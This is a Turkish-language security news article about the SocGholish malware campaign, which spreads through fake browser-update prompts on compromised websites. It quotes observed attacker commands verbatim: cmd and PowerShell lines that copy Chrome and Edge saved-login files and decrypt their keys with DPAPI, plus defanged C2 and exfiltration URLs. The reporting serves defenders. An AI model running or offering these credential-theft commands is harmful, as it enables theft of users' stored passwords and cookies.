SocGholish, Sahte Tarayıcı Güncellemeleri Yoluyla Şirketlere Saldırıyor

   Mayıs 9, 2024  Posted in GBHackers


Şirketler, aldatıcı tarayıcı güncelleme istemleri yoluyla SocGholish olarak bilinen kötü amaçlı yazılım tarafından hedefleniyor.

Gizliliği ve dağıtım mekanizmalarının karmaşıklığıyla ünlü olan bu kötü amaçlı yazılım, kullanıcıları kötü amaçlı yükleri indirmeleri için kandıran sahte tarayıcı güncellemelerini içeren bir dizi olayda tespit edildi.

ESentire yakın zamanda SocGholish kötü amaçlı yazılımının işletmelere sızdığını vurgulayan bir rapor yayınladı.

Bu kötü amaçlı yazılım, sahte tarayıcı güncellemeleri yoluyla yayılıyor ve kuruluşlar için önemli güvenlik endişelerine neden oluyor.

Enfeksiyon Vektörü: Güvenliği Tehlikeye Giren Web Siteleri

SocGholish saldırısının ilk aşaması, saldırganların kötü amaçlı JavaScript kodu enjekte ettiği meşru web sitelerinin tehlikeye atılmasını içerir.

Bu web sitelerini ziyaret eden şüphelenmeyen kullanıcılar, onları tarayıcı güncellemelerini indirmeye teşvik eden açılır bildirimler alır.

Ancak bu yönlendirmeler akıllıca gizlenmiş tuzaklardır.

Genellikle “Update.js” olarak adlandırılan indirilen dosya, SocGholish kötü amaçlı yazılımını barındırıyor ve yürütüldüğünde bulaşma sürecini başlatıyor.

Güvenliği Tehlikeye Uğramış Bir Web Sitesine JavaScript Enjekte Edildi
Güvenliği Tehlikeye Uğramış Bir Web Sitesine JavaScript Enjekte Edildi
Gizlemesi kaldırılmış komut dosyası
Gizlemesi kaldırılmış komut dosyası

SocGholish kötü amaçlı yazılımı, otomatik analiz araçları tarafından tespit edilmekten kaçınmak için gelişmiş kaçınma teknikleri kullanır.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Örneğin tarayıcının “navigator.webdriver” özelliği aracılığıyla Selenium gibi otomasyon araçlarını kontrol eder.

Kötü amaçlı yazılım, tespit edilmesi durumunda diğer eylemleri durdurarak otomatik güvenlik analizinden etkili bir şekilde kaçınır.

Başarılı bir kaçışın ardından SocGholish, yükünü yürütmeye devam ediyor.

Komut dosyasında sağlanan URL örnekleri şunlardır:

hxxps://ghost.blueecho88[.]com/XnkKYSVbaQg6WzBTaU0mQy0NbxF8QygRLBxpCTsaYT40ClUHLBZkFTsLeA4sWyZDOwt4DixbMFByW3hDZFtvBy4JbEMj
hxxps://ghost.blueecho88[.]com/U5WuWyi3zTI3t5RpZKGCeSDhyytxr4wrIfDNMzb2xQQ55vE9IfrALzbn3DQht4J5NufcNCG3lGl/t9x5abfKNz3wxDAl/cw3NeXXPDG30w==
hxxps://ghost.blueecho88[.]com/gcGKZ/rj6Q7l47BVtvWmRfK17xej+6gG76DmHvuk1QHx46ZF8+OwReumqBo=

Bu yazılım, kullanıcı etkileşimine ve yönetici oturumunu belirten WordPress çerezlerinin tespit edilmesi gibi belirli koşullara bağlı olarak ek kötü amaçlı komut dosyaları indiren, gizlenmiş JavaScript kodunun yürütülmesiyle başlayan, çok aşamalı bir bulaşma süreci kullanır.

Update.js'nin içeriği
Update.js’nin içeriği

Komut dosyası tarafından hxxps://tfuq.register.arpsychoterapi.com/editContent URL’sine bir POST isteği gönderilir.

“lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==” verisi “send” metodu ile sunucuya gönderilir.

Gizlemesi kaldırılmış Update.js
Gizlemesi kaldırılmış Update.js

Sömürü Sonrası Faaliyet

İlk ele geçirmenin ardından saldırganlar, Microsoft Edge ve Google Chrome gibi tarayıcılardan depolanan şifrelerin çıkarılması ve aşağıdaki komutları kullanarak bunları dışarı sızmak üzere geçici bir dosyaya kopyalamak da dahil olmak üzere uygulamalı faaliyetlere girişir:

"C:\Windows\System32\cmd.exe" /C type "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" >> "C:\Users\username\AppData\Local\Temp\2\radC7958.tmp"
"C:\Windows\System32\cmd.exe" /C type "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" >> "C:\Users\username\AppData\Local\Temp\2\rad01734.tmp"

Kısa bir süre sonra, oturum açma veri dosyalarını hem Edge hem de Chrome tarayıcılarından farklı bir kullanıcının İndirilenler dizinine kopyalamak ve ardından etkinliği veya hataları geçici bir dosyaya kaydetmek için başka bir komut çalıştırıldı (kullanıcı adı – etkilenen birincil kullanıcıdır, kullanıcı adı_2 aynı kullanıcıdaki başka bir kullanıcıdır) makine):

"C:\Windows\System32\cmd.exe" /C copy "C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" C:\users\username_2 \Downloads\0395edg.bin© "C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data" C:\users\username_2\Downloads\0396chr.bin >> "C:\Users\username\AppData\Local\Temp\2\rad5914F.tmp"

Kimlik bilgisi verilerinin başka bir kullanıcı altında hazırlanması, ana dosyaların keşfedilmesi durumunda büyük olasılıkla yedeklilik amacıyla yapılır.

Tehdit oyuncuları daha sonra base64’te kodlanmış bir komutu çalıştırmak için PowerShell’i kullanmaya çalıştı.

Kodu çözülen komut, DPAPI’yi (Veri Koruma API’si) kullanarak Edge ve Chrome’un şifreler ve çerezler için şifreleme anahtarlarını alır ve bunların şifresini çözer.

Daha sonra sonuçları tek kullanımlık bir dosyaya kaydeder.

Kodu çözülen komutlar:

"C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:\Users\username\AppData\Local\Temp\2\rad1F269.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State").split(',')| select-string encrypted_key; $2 = $1 -replace '"}', '' -replace '"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 = [System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 = [System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4 >> "C:\Users\username\AppData\Local\Temp\2\rad65036.tmp"

Bundan sonra saldırganlar, Python’un taşınabilir bir sürümünü “AppDataLocalConnectedDevicesPlatform” yolu altında çalıştırmak için kullanılabilecek şekilde indirme, çıkarma ve kurmayla ilgili çeşitli işlemleri gerçekleştiren PowerShell komutunu çalıştırmayı 10 kez denedi. daha fazla Python verisi.

powershell -c "wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;ls C:\Users\ username \AppData\Local\ConnectedDevicesPlatform\python.zip;Expand-Archive -LiteralPath C:\Users\ username \AppData\Local\ConnectedDevicesPlatform\python.zip -DestinationPath C:\Users\ username \AppData\Local\ConnectedDevicesPlatform\pypa;rm C:\Users\ username \AppData\Local\ConnectedDevicesPlatform\python.zip;ls C:\Users\ username \AppData\Local\ConnectedDevicesPlatform\pypa;wget https://bootstrap.pypa.io/get-pip.py -OutFile C:\Users\ username \AppData\Local\ConnectedDevicesPlatform\pypa\get-pip.py;cd C:\Users\ username \AppData\Local\ConnectedDevicesPlatform\pypa;mkdir DLLs;ren python312._pth python312.pth"

Kötü adamlar daha sonra Powershell’i kullanarak Microsoft Outlook’un kullandığı HTML imza dosyalarını değiştiren base64 kodlu bir komutu çalıştırdılar.

"C:\Windows\System32\cmd.exe" /C powershell.exe -encodedCommand Get-ChildItem -Path $env:APPDATA\Microsoft\Signatures -Filter *.htm | ForEach-Object { (Get-Content $_.FullName) -replace '', "`r`n`r`n" | Set-Content $_.FullName } >> "C:\Users\username\AppData\Local\Temp\2\rad1F1BD.tmp"

Daha sonra kötü adamlar, bir etki alanı ayarındaki “etki alanı kullanıcıları” grup üyelerinin listesini görmek için C:\Windows\system32\net1 grubu “etki alanı kullanıcıları” /etki alanı komutunu çalıştırdılar.

Bu kısayollar, son komut kullanılarak ağ paylaşımında oluşturulacaktır.

Hedef yol sizi ağ paylaşımının konumuna götürür. Simge sizi 170.130.55’e götürür[.]SocGholish C2 ağındaki 72/Documentation.ico sitesi.

"C:\Windows\System32\cmd.exe" /C powershell $W = New-Object -comObject WScript.Shell;$S = $W.CreateShortcut('\\\Documentation.lnk');$S.TargetPath="\\";$S.IconLocation = '\\170.130.55[.]72\Documentation.ico';$S.Save() >> "C:\Users\username\AppData\Local\Temp\2\rad69C33.tmp"

Bir kez daha bu emrin ne için olduğunu bilmiyoruz.

Ancak bunun yukarıda bahsettiğimiz e-posta imzasıyla aynı olduğunu düşünüyoruz, böylece olaylara göz kulak olabiliriz.

Bunun nedeni, bağlantı dosyalarının her açılışında C2 sunucusunun simge dosyasını almasının talep edilmesidir.

SocGholish saldırı kampanyası içeri girmek için sahte güncellemeler ve sosyal mühendislik kullandı. Daha sonra özel verileri almak ve kullanıcıların siteyle nasıl etkileşime girdiğini izlemek için komut dosyası içeren eylemler kullandılar.

Savunmaya Yönelik Öneriler

SocGholish’in oluşturduğu artan tehdide yanıt olarak siber güvenlik uzmanları çeşitli savunma önlemleri önermektedir:

  • Uç Nokta Koruması: Tehditleri tespit etmek ve azaltmak için tüm cihazların Uç Nokta Tespit ve Yanıt (EDR) çözümlerine sahip olduğundan emin olun.
  • Kimlik Avı ve Güvenlik Farkındalığı Eğitimi: Doğrulanmamış kaynaklardan dosya indirmeyle ilgili riskler ve tarayıcı güncellemelerinin orijinalliğini doğrulamanın önemi konusunda çalışanları eğitin.
  • Şifre Yönetimi: Parola yöneticilerinin kullanımını teşvik edin ve parolaların tarayıcılarda saklanmasını önleyin.
  • Komut Dosyası Yürütme Ayarları: Otomatik yürütmeyi önlemek için komut dosyası dosyalarının varsayılan ayarlarını değiştirin; bunun yerine Not Defteri gibi bir metin düzenleyiciyle açmayı tercih edin.

SocGholish kötü amaçlı yazılım kampanyası, giderek karmaşıklaşan sosyal mühendislik saldırıları karşısında dikkatli olmanın ve siber güvenlik hijyeninin kritik öneminin altını çiziyor.

İşletmeler, önerilen güvenlik önlemlerini benimseyerek ve bir farkındalık kültürü geliştirerek bu tür aldatıcı taktiklerin kurbanı olma riskini önemli ölçüde azaltabilir.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide



Source link